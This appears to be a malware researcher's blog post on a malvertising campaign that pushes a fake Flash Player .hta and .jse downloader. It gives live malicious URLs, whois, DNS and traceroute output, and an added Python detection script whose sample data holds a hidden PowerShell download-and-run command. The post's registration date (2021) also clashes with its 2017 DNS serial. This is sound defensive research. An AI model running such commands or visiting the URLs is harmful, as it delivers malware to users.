Fake Flashplayer Update Via Exploit Using Adverts On Legit Site

For a change this is about an exploit, rather than a malspam email.

I was reading posts on a well-known tech forum, when I got a sudden divert and a .hta file attempted to download. Of course I immediately saved the file, rather than letting it run. I won’t name the tech forum at this stage, to allow the admin time to investigate and check what advert I think caused it. It was an advert for HP LaserJet printers that was not using Flash but did have moving images. I think the divert happened when I moused over the advert whilst scrolling down the page.

Anyway the divert was to https://eiyahpornhub.org/5101454380687/6481137a7f7240574c225b198be9c16d/34cacd8a11e39b3bbc01955b9b1eac15.html (note the “safe Secure” https: link). HTTPS does not mean safe. It means secure from interception in normal circumstances.

Update: it looks like the link is dynamically created and changes on each visit from the referrer (the dodgy advert). I haven’t been able to get back to the site and get a 404 every time. I can get the .jse file, and multiple visits to that are allowed. Lots of exploits refuse to allow the same IP & referral ID more than 1 visit, to stop antivirus companies and researchers investigating them easily.

This downloaded FlashPlayer.hta (VirusTotal) (Payload Security), which is just an instruction to the computer to use PowerShell to download silently in the background https://eiyahpornhub.org/5101454380687/1491733844471718/FlashPlayer.jse (VirusTotal) (Payload Security), which isn’t showing any further downloads, so I have no idea at this stage what the end malware is intended to be.
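
Added example (not part of the original post): one way to hunt in process-creation telemetry for the chain described above, an .hta launching PowerShell that quietly fetches a .jse which a script host then runs. The event records, host and user names, the example.test URL and the rule names are constructed, and the fields assume Sysmon-style parent image, image and command line.

```python
import ntpath
import re

# Constructed process-creation records (parent image, image, command line).
# Hosts, users, paths and the example.test URL are invented for this example.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"host": "ws-014", "parent": r"C:\Windows\System32\mshta.exe", "image": PS,
     "cmd": r"powershell.exe -w hidden -nop -c (New-Object Net.WebClient)"
            r".DownloadFile('https://cdn.example.test/FlashPlayer.jse',"
            r"'C:\Users\amy\AppData\Local\Temp\FlashPlayer.jse')"},
    {"host": "ws-014", "parent": PS, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\amy\AppData\Local\Temp\FlashPlayer.jse"'},
    {"host": "ws-022", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"host": "ws-031", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\bob\Downloads\FlashPlayer.hta"'},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
USER_DIR = re.compile(r"\\(appdata|temp|downloads)\\", re.I)
HIDDEN = re.compile(r"-w(in(dowstyle)?)?\s+h(idden)?\b", re.I)
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)
SCRIPT = re.compile(r"\.(jse|js|vbe|vbs|wsf)\b", re.I)
HTA = re.compile(r"\.hta\b", re.I)

def exe(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path).lower()

def triage(ev):
    """Return the names of the rules that one event matches."""
    parent, image, cmd = exe(ev["parent"]), exe(ev["image"]), ev["cmd"]
    hits = []
    if parent == "mshta.exe" and image in INTERPRETERS:
        hits.append("hta-spawned-interpreter")
    if image in {"powershell.exe", "pwsh.exe"} and HIDDEN.search(cmd) and DOWNLOAD.search(cmd):
        hits.append("hidden-powershell-download")
    if image in {"wscript.exe", "cscript.exe"} and SCRIPT.search(cmd) and USER_DIR.search(cmd):
        hits.append("script-host-runs-user-dir-script")
    if image == "mshta.exe" and HTA.search(cmd) and USER_DIR.search(cmd):
        hits.append("hta-from-user-dir")
    return hits

def scan(events):
    """Triage every event and keep only (host, rules) pairs with a match."""
    results = [(ev["host"], triage(ev)) for ev in events]
    return [(host, rules) for host, rules in results if rules]
```

Calling `scan(SAMPLE_EVENTS)` flags both stages on ws-014 and the saved-but-opened .hta on ws-031, while the ordinary `-File` PowerShell run on ws-022 matches nothing.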

This seems very similar to the campaign posted on https://www.bleepingcomputer.com/news/security/skype-malvertising-campaign-pushes-fake-flash-player/

In both cases nobody has actually got the final payload. All I managed to get was https://eiyahpornhub.org/67d05900efa21668e417c34f5adb32e1.mp4 (now down) (VirusTotal | MALWR), which is just plain text (possibly encrypted) that would need the original jse file to decrypt it to something useful (if it is encrypted text and not just some sort of identity string).

Whole package as a P/W zip file (password “infected”): 9 april_ fake_flash_player_malvertising, just in case some other researcher can make use of it.

eiyahpornhub.org was registered yesterday, 8 April 2021 (https://whois.icann.org/en/lookup?name=eiyahpornhub.org). I very much doubt that the listed registrant’s details are correct. They are probably stolen details and credit card used to register this domain.

It appears to be hosted on 192.129.162.108, allegedly used by a Russian entity.

Network Whois Record

Queried rwhois.hostwinds.com with “192.129.162.108”…

%rwhois V-1.5:003fff:00 rwhois.hostwinds.com (by Network Solutions, Inc. V-1.5.9.5)
network:Class-Name:network
network:ID:Hostwinds Block-192.129.162.108/32
network:Auth-Area:192.129.162.108/32
network:Network-Name:SergSoft Network
network:IP-Network:192.129.162.108/32
network:IP-Network-Block:192.129.162.108 - 192.129.162.108
network:Customer Organization:SergSoft
network:Customer Address;I:Krasniy Kazanetz 1-2-88
network:Customer City;I:Moscow
network:Customer State/Province;I:RU
network:Customer Postal Code;I:111395
network:Customer Country Code;I:RU
network:Organization;I:Hostwinds LLC
network:Tech-Contact;I:[email protected]
network:Admin-Contact;I:[email protected]
network:Abuse-Contact;I:[email protected]

%ok

Queried whois.arin.net with “n 192.129.162.108”…

NetRange:       192.129.128.0 - 192.129.255.255
CIDR:           192.129.128.0/17
NetName:        HOSTWINDS-17-1
NetHandle:      NET-192-129-128-0-1
Parent:         NET192 (NET-192-0-0-0-0)
NetType:        Direct Allocation
OriginAS:       AS54290
Organization:   Hostwinds LLC. (HL-29)
RegDate:        2013-01-30
Updated:        2013-12-19
Ref:            https://whois.arin.net/rest/net/NET-192-129-128-0-1


OrgName:        Hostwinds LLC.
OrgId:          HL-29
Address:        1002 Reunion Center, 9 East 4th Street
City:           Tulsa
StateProv:      OK
PostalCode:     74103
Country:        US
RegDate:        2011-11-30
Updated:        2017-01-28
Comment:        http://www.hostwinds.com
Comment:        Standard NOC hours are 6:00am to 12:00am CST
Ref:            https://whois.arin.net/rest/org/HL-29

ReferralServer:  rwhois://rwhois.hostwinds.com:4321

OrgTechHandle: HNOC9-ARIN
OrgTechName:   Hostwinds Network Operations Center
OrgTechPhone:  +1-206-886-0665
OrgTechEmail:  [email protected]
OrgTechRef:    https://whois.arin.net/rest/poc/HNOC9-ARIN

OrgAbuseHandle: HAC3-ARIN
OrgAbuseName:   Hostwinds Abuse Center
OrgAbusePhone:  +1-206-886-0665
OrgAbuseEmail:  [email protected]
OrgAbuseRef:    https://whois.arin.net/rest/poc/HAC3-ARIN

OrgNOCHandle: HNOC9-ARIN
OrgNOCName:   Hostwinds Network Operations Center
OrgNOCPhone:  +1-206-886-0665
OrgNOCEmail:  [email protected]
OrgNOCRef:    https://whois.arin.net/rest/poc/HNOC9-ARIN

DNS Records

name class type data time to live
eiyahpornhub.org IN SOA
    server: ns21.cloudns.net
    email: [email protected]
    serial: 2017040912
    refresh: 7200
    retry: 1800
    expire: 1209600
    minimum ttl: 3600
    3600s (01:00:00)
eiyahpornhub.org IN A 192.129.162.108 60s (00:01:00)
eiyahpornhub.org IN MX
    preference: 10
    exchange: mail.eiyahpornhub.org
    60s (00:01:00)
eiyahpornhub.org IN NS ns23.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns22.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns24.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS ns22.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns21.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS pns23.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS ns24.cloudns.net 3600s (01:00:00)
eiyahpornhub.org IN NS ns21.cloudns.net 3600s (01:00:00)
108.162.129.192.in-addr.arpa IN PTR client-192-129-162-108.hostwindsdns.com 14400s (04:00:00)
162.129.192.in-addr.arpa IN SOA
    server: 162.129.192.in-addr.arpa
    email: [email protected]
    serial: 2017032407
    refresh: 10800
    retry: 3600
    expire: 604800
    minimum ttl: 3600
    600s (00:10:00)

Traceroute

Tracing route to eiyahpornhub.org [192.129.162.108]

hop rtt rtt rtt ip address fully qualified domain name
1 177 0 30 208.101.16.73 49.10.65d0.ip4.static.sl-reverse.com
2 0 0 0 66.228.118.153 ae11.dar01.sr01.dal01.networklayer.com
3 0 0 0 173.192.18.254 ae14.bbr02.eq01.dal03.networklayer.com
4 0 0 0 4.35.184.45 ae57.edge6.dallas3.level3.net
5 * * *
6 * * *
7 0 2 5 23.238.104.129 client-23-238-104-129.hostwindsdns.com
8 1 0 0 192.129.162.108 client-192-129-162-108.hostwindsdns.com